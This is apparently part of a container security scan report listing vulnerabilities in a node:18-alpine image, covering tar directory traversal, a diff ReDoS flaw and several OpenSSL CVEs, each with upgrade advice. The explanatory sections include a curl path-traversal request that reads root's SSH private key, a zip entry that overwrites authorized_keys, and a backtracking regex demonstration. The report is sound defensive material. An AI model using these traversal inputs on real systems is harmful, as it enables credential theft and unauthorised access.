  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
+ +
+ +
+ +

Overview

+

tar is a full-featured Tar for Node.js.

+

Affected versions of this package are vulnerable to Directory Traversal via processing of hardlinks. An attacker can read or overwrite arbitrary files on the file system by crafting a malicious TAR archive that bypasses path traversal protections during extraction.

+

Details

+

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

+

Directory Traversal vulnerabilities can be generally divided into two types:

+
    +
  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
    • +
+

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

+

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

+ 
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
+
+

Note %2e is the URL encoded version of . (dot).

+
    +
  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.
    • +
+

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

+

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

+ 
2018-04-15 22:04:29 .....           19           19  good.txt
+        2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys
+
+

Remediation

+

Upgrade tar to version 7.5.7 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

Artistic-2.0 license

+
+ +
+
+ medium severity +
+
+ +
+ +
    +
  • + Manifest file: node:18-alpine /usr/local/lib/node_modules +
    • +
  • + Package Manager: npm +
    • +
  • + Module: + + npm +
    • + +
  • Introduced through: + + lib@* and npm@10.8.2 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + lib@* + + npm@10.8.2 + + + +
    • +
+ +
+ +
+ +

Artistic-2.0 license

+ +
+ +
+

More about this vulnerability

+
+ +
+
+

Regular Expression Denial of Service (ReDoS)

+
+ +
+
+ medium severity +
+
+ Exploit: Proof of Concept +
+
+ +
+ +
    +
  • + Manifest file: node:18-alpine /usr/local/lib/node_modules +
    • +
  • + Package Manager: npm +
    • +
  • + Vulnerable module: + + diff +
    • + +
  • Introduced through: + + + lib@*, npm@10.8.2 and others +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + diff@5.2.0 + + + +
    • +
+ +
+ +
+ +

Overview

+

diff is a javascript text differencing implementation.

+

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the parsePatch() and applyPatch() functions if the user input passed without sanitisation. An attacker can cause the process to enter an infinite loop and exhaust system memory by providing a patch with filename headers containing \r, \u2028, or \u2029 characters or having control over patch's patch header for application generated patches.

+

Details

+

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

+

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

+

Let’s take the following regular expression as an example:

+ 
regex = /A(B|C+)+D/
+
+

This regular expression accomplishes the following:

+
    +
  • A The string must start with the letter 'A'
    • +
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
    • +
  • D Finally, we ensure this section of the string ends with a 'D'
    • +
+

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

+

It most cases, it doesn't take very long for a regex engine to find a match:

+ 
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
+        0.04s user 0.01s system 95% cpu 0.052 total
+        
+        $ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
+        1.79s user 0.02s system 99% cpu 1.812 total
+
+

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

+

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

+

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

+
    +
  1. CCC
    2. +
  2. CC+C
    3. +
  3. C+CC
    4. +
  4. C+C+C.
    5. +
+

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

+

From there, the number of steps the engine must use to validate a string just continues to grow.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
StringNumber of C'sNumber of steps
ACCCX338
ACCCCX471
ACCCCCX5136
ACCCCCCCCCCCCCCX1465,553
+

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

+

Remediation

+

Upgrade diff to version 3.5.1, 4.0.4, 5.2.2, 8.0.3 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-9230

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: An application trying to decrypt CMS messages encrypted using + password based encryption can trigger an out-of-bounds read and write.

+

Impact summary: This out-of-bounds read may trigger a crash which leads to + Denial of Service for an application. The out-of-bounds write can cause + a memory corruption which can have various consequences including + a Denial of Service or Execution of attacker-supplied code.

+

Although the consequences of a successful exploit of this vulnerability + could be severe, the probability that the attacker would be able to + perform it is low. Besides, password based (PWRI) encryption support in CMS + messages is very rarely used. For that reason the issue was assessed as + Moderate severity according to our Security Policy.

+

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this + issue, as the CMS implementation is outside the OpenSSL FIPS module + boundary.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.5-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-9231

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: A timing side-channel which could potentially allow remote + recovery of the private key exists in the SM2 algorithm implementation on 64 bit + ARM platforms.

+

Impact summary: A timing side-channel in SM2 signature computations on 64 bit + ARM platforms could allow recovering the private key by an attacker..

+

While remote key recovery over a network was not attempted by the reporter, + timing measurements revealed a timing signal which may allow such an attack.

+

OpenSSL does not directly support certificates with SM2 keys in TLS, and so + this CVE is not relevant in most TLS contexts. However, given that it is + possible to add support for such certificates via a custom provider, coupled + with the fact that in such a custom provider context the private key may be + recoverable via remote timing measurements, we consider this to be a Moderate + severity issue.

+

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this + issue, as SM2 is not an approved algorithm.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.5-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-9232

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: An application using the OpenSSL HTTP client API functions may + trigger an out-of-bounds read if the 'no_proxy' environment variable is set and + the host portion of the authority component of the HTTP URL is an IPv6 address.

+

Impact summary: An out-of-bounds read can trigger a crash which leads to + Denial of Service for an application.

+

The OpenSSL HTTP client API functions can be used directly by applications + but they are also used by the OCSP client functions and CMP (Certificate + Management Protocol) client implementation in OpenSSL. However the URLs used + by these implementations are unlikely to be controlled by an attacker.

+

In this vulnerable code the out of bounds read can only trigger a crash. + Furthermore the vulnerability requires an attacker-controlled URL to be + passed from an application to the OpenSSL function and the user has to have + a 'no_proxy' environment variable set. For the aforementioned reasons the + issue was assessed as Low severity.

+

The vulnerable code was introduced in the following patch releases: + 3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.

+

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this + issue, as the HTTP client implementation is outside the OpenSSL FIPS module + boundary.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.5-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-69419

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously + crafted PKCS#12 file with a BMPString (UTF-16BE) friendly name containing + non-ASCII BMP code point can trigger a one byte write before the allocated + buffer.

+

Impact summary: The out-of-bounds write can cause a memory corruption + which can have various consequences including a Denial of Service.

+

The OPENSSL_uni2utf8() function performs a two-pass conversion of a PKCS#12 + BMPString (UTF-16BE) to UTF-8. In the second pass, when emitting UTF-8 bytes, + the helper function bmp_to_utf8() incorrectly forwards the remaining UTF-16 + source byte count as the destination buffer capacity to UTF8_putc(). For BMP + code points above U+07FF, UTF-8 requires three bytes, but the forwarded + capacity can be just two bytes. UTF8_putc() then returns -1, and this negative + value is added to the output length without validation, causing the + length to become negative. The subsequent trailing NUL byte is then written + at a negative offset, causing write outside of heap allocated buffer.

+

The vulnerability is reachable via the public PKCS12_get_friendlyname() API + when parsing attacker-controlled PKCS#12 files. While PKCS12_parse() uses a + different code path that avoids this issue, PKCS12_get_friendlyname() directly + invokes the vulnerable function. Exploitation requires an attacker to provide + a malicious PKCS#12 file to be parsed by the application and the attacker + can just trigger a one zero byte write before the allocated buffer. + For that reason the issue was assessed as Low severity according to our + Security Policy.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, + as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

+

OpenSSL 1.0.2 is not affected by this issue.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.6-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-69418

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: When using the low-level OCB API directly with AES-NI or<br>other hardware-accelerated code paths, inputs whose length is not a multiple<br>of 16 bytes can leave the final partial block unencrypted and unauthenticated.<br><br>Impact summary: The trailing 1-15 bytes of a message may be exposed in<br>cleartext on encryption and are not covered by the authentication tag,<br>allowing an attacker to read or tamper with those bytes without detection.<br><br>The low-level OCB encrypt and decrypt routines in the hardware-accelerated<br>stream path process full 16-byte blocks but do not advance the input/output<br>pointers. The subsequent tail-handling code then operates on the original<br>base pointers, effectively reprocessing the beginning of the buffer while<br>leaving the actual trailing bytes unprocessed. The authentication checksum<br>also excludes the true tail bytes.<br><br>However, typical OpenSSL consumers using EVP are not affected because the<br>higher-level EVP and provider OCB implementations split inputs so that full<br>blocks and trailing partial blocks are processed in separate calls, avoiding<br>the problematic code path. Additionally, TLS does not use OCB ciphersuites.<br>The vulnerability only affects applications that call the low-level<br>CRYPTO_ocb128_encrypt() or CRYPTO_ocb128_decrypt() functions directly with<br>non-block-aligned lengths in a single call on hardware-accelerated builds.<br>For these reasons the issue was assessed as Low severity.<br><br>The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected<br>by this issue, as OCB mode is not a FIPS-approved algorithm.<br><br>OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.<br><br>OpenSSL 1.0.2 is not affected by this issue.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.6-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-15468

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: If an application using the SSL_CIPHER_find() function in + a QUIC protocol client or server receives an unknown cipher suite from + the peer, a NULL dereference occurs.

+

Impact summary: A NULL pointer dereference leads to abnormal termination of + the running process causing Denial of Service.

+

Some applications call SSL_CIPHER_find() from the client_hello_cb callback + on the cipher ID received from the peer. If this is done with an SSL object + implementing the QUIC protocol, NULL pointer dereference will happen if + the examined cipher ID is unknown or unsupported.

+

As it is not very common to call this function in applications using the QUIC + protocol and the worst outcome is Denial of Service, the issue was assessed + as Low severity.

+

The vulnerable code was introduced in the 3.2 version with the addition + of the QUIC protocol support.

+

The FIPS modules in 3.6, 3.5, 3.4 and 3.3 are not affected by this issue, + as the QUIC implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4 and 3.3 are vulnerable to this issue.

+

OpenSSL 3.0, 1.1.1 and 1.0.2 are not affected by this issue.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.6-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-69420

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: A type confusion vulnerability exists in the TimeStamp Response + verification code where an ASN1_TYPE union member is accessed without first + validating the type, causing an invalid or NULL pointer dereference when + processing a malformed TimeStamp Response file.

+

Impact summary: An application calling TS_RESP_verify_response() with a + malformed TimeStamp Response can be caused to dereference an invalid or + NULL pointer when reading, resulting in a Denial of Service.

+

The functions ossl_ess_get_signing_cert() and ossl_ess_get_signing_cert_v2() + access the signing cert attribute value without validating its type. + When the type is not V_ASN1_SEQUENCE, this results in accessing invalid memory + through the ASN1_TYPE union, causing a crash.

+

Exploiting this vulnerability requires an attacker to provide a malformed + TimeStamp Response to an application that verifies timestamp responses. The + TimeStamp protocol (RFC 3161) is not widely used and the impact of the + exploit is just a Denial of Service. For these reasons the issue was + assessed as Low severity.

+

The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, + as the TimeStamp Response implementation is outside the OpenSSL FIPS module + boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

+

OpenSSL 1.0.2 is not affected by this issue.

+

Remediation

+

Upgrade Alpine:3.21 openssl to version 3.3.6-r0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

CVE-2025-66199

+
+ +
+
+ low severity +
+
+ Exploit: Not Defined +
+
+ +
+ +
    +
  • + Package Manager: alpine:3.21 +
    • +
  • + Vulnerable module: + + openssl/libcrypto3 +
    • + +
  • Introduced through: + + docker-image|node@18-alpine and openssl/libcrypto3@3.3.3-r0 + +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + openssl/libcrypto3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + apk-tools/apk-tools@2.14.6-r3 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
  • + Introduced through: + docker-image|node@18-alpine + + busybox/ssl_client@1.37.0-r12 + + openssl/libssl3@3.3.3-r0 + + + +
    • +
+ +
+ +
+ +

NVD Description

+

Note: Versions mentioned in the description apply only to the upstream openssl package and not the openssl package as distributed by Alpine. + See How to fix? for Alpine:3.21 relevant fixed versions and status.

+

Issue summary: A TLS 1.3 connection using certificate compression can be + forced to allocate a large buffer before decompression without checking + against the configured certificate size limit.

+

Impact summary: An attacker can cause per-connection memory allocations of + up to approximately 22 MiB and extra CPU work, potentially leading to + service degradation or resource exhaustion (Denial of Service).

+

In affected configurations, the peer-supplied uncompressed certificate + length from a CompressedCertificate message is used to grow a heap buffer + prior to decompression. This length is not bounded by the max_cert_list + setting, which otherwise constrains certificate message sizes. An attacker + can exploit this to cause large per-connection allocations followed by + handshake failure. No memory corruption or information disclosure occurs.

+

This issue only affects builds where TLS 1.3 certificate compression is + compiled in (i.e., not OPENSSL_NO_COMP_ALG) and at least one compression + algorithm (brotli, zlib, or zstd) is available, and where the compression + extension is negotiated. Both clients receiving a server CompressedCertificate + and servers in mutual TLS scenarios receiving a client CompressedCertificate + are affected. Servers that do not request client certificates are not + vulnerable to client-initiated attacks.

+

